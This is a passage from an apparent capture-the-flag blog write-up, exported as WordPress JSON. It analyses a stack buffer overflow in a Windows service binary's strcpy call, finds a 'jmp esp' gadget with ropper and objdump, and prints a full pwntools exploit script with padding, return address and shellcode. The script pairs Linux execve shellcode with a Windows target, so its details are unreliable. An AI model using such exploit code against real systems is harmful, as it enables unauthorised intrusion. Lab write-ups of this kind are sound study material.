bind failed: %d&quot;, v5);\n    }\n    printf(&quot;[+] bind done on port %d\\n&quot;, v18);\n    listen(s, 3);\n    printf(&quot;[+] waiting for connections.\\n&quot;);\n    addrlen = 16;\n    while ( 1 )\n    {\n      v14 = accept(s, &amp;addr, &amp;addrlen);\n      if ( v14 == -1 )\n        break;\n      printf(&quot;[+] received connection.\\n&quot;);\n      memset(&amp;Dst, 0, 0x3E8u);\n      v6 = strlen(Str);\n      send(v14, Str, v6, 0);\n      recv(v14, &amp;Dst, 1000, 0);\n      v17 = get_reply(&amp;Dst);\n      printf(&quot;[+] check is %d\\n&quot;, v17);\n      if ( get_reply(&amp;Dst) )\n      {\n        v8 = strlen(buf);\n        send(v14, v21, v8, 0);\n      }\n      else\n      {\n        v7 = strlen(v21);\n        send(v14, buf, v7, 0);\n      }\n      closesocket(v14);\n    }\n    v9 = WSAGetLastError();\n    printf(&quot;[!] accept failed: %d&quot;, v9);\n  }\n  return 1;\n}<\/code><\/pre>\n<p><code>Dst<\/code> is a stack buffer of <code>0x3F8 - 0x210 = 1000 bytes<\/code> and recv reads at most 1000 bytes into it, so there is nothing exploitable in main itself; look at the other functions:<\/p>\n<pre><code class=\"language-c\">int __cdecl get_reply(char *Source)\n{\n  size_t v1; \/\/ eax\n  char Dest; \/\/ [esp+10h] [ebp-208h]\n\n  printf(&quot;[get_reply] s = [%s]\\n&quot;, Source);\n  strcpy(&amp;Dest, Source);\n  v1 = strlen(&amp;Dest);\n  printf(&quot;[get_reply] copied %d bytes to buffer\\n&quot;, v1);\n  return strcmp(&amp;Dest, &quot;shitstorm\\n&quot;);\n}<\/code><\/pre>\n<p>There is the bug: <code>strcpy<\/code> copies the up-to-1000-byte input into <code>Dest<\/code>, which sits at <code>ebp-0x208<\/code> (520 bytes), with no length check. 520 bytes fill the buffer, 4 more overwrite the saved EBP, and the return address lands at offset 524, exactly what pattern_offset reported.<\/p>\n<h4>Searching for a return address<\/h4>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Deba]\n\u2514\u2500$ ropper --file brainfuck.exe --search &#039;jmp esp&#039;\n[INFO] Load gadgets from cache\n[LOAD] loading... 100%\n[LOAD] removing double gadgets... 
100%\n[INFO] Searching for gadgets: jmp esp\n\n[INFO] File: brainfuck.exe\n0x311712f3: jmp esp; \n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Deba]\n\u2514\u2500$ objdump -D brainfuck.exe | grep jmp | grep esp\n311712f3:       ff e4                   jmp    *%esp<\/code><\/pre>\n<h4>Attempting the overflow<\/h4>\n<pre><code class=\"language-python\">from pwn import *\n\ncontext.update(os=&#039;linux&#039;, arch=&#039;i386&#039;)\ntarget_ip = &#039;192.168.10.102&#039;\ntarget_port = 9999\n\n# 524 bytes of padding reach the saved return address (pattern_offset result)\njunk = b&#039;a&#039; * 524\n# jmp esp gadget found in brainfuck.exe with ropper\/objdump\nret_addr = p32(0x311712f3)\n# execve(&quot;\/bin\/sh&quot;) shellcode (32-bit)\nshellcode = asm(shellcraft.sh())\n\npayload = junk + ret_addr + shellcode\n\nconn = None\ntry:\n    conn = remote(target_ip, target_port)\n    conn.recvuntil(b&#039;&gt;&gt;&#039;)\n\n    # send the payload\n    conn.send(payload)\n    log.info(&quot;[+] Exploit!!!!!&quot;)\n    conn.interactive()\n\nexcept Exception as e:\n    log.error(f&quot;[-] Exploit failed: {e}&quot;)\nfinally:\n    # conn is only set if remote() succeeded\n    if conn:\n        conn.close()<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506172312773.png'><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506172312773.png\" alt=\"image-20250617230243806\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' 
href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506172312774.png'><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506172312774.png\" alt=\"image-20250617230256705\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>Hiss..... there is probably some luck involved here.<\/p>\n<p>I remember <code>brainfuck<\/code> being an encryption scheme; I don't know whether this box has anything to do with that....<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506172312775.png'><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506172312775.png\" alt=\"image-20250617161522551\" \/><\/div><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Deba Information Gathering Port Scanning \u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Deba] \u2514\u2500$ rustsca 
[&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,19,18],"tags":[],"class_list":["post-886","post","type-post","status-publish","format-standard","hentry","category-ctf-and-protest","category-pwn","category-web"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/886","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=886"}],"version-history":[{"count":1,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/886\/revisions"}],"predecessor-version":[{"id":887,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/886\/revisions\/887"}],"wp:attachment":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=886"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=886"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/tags?post=886"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}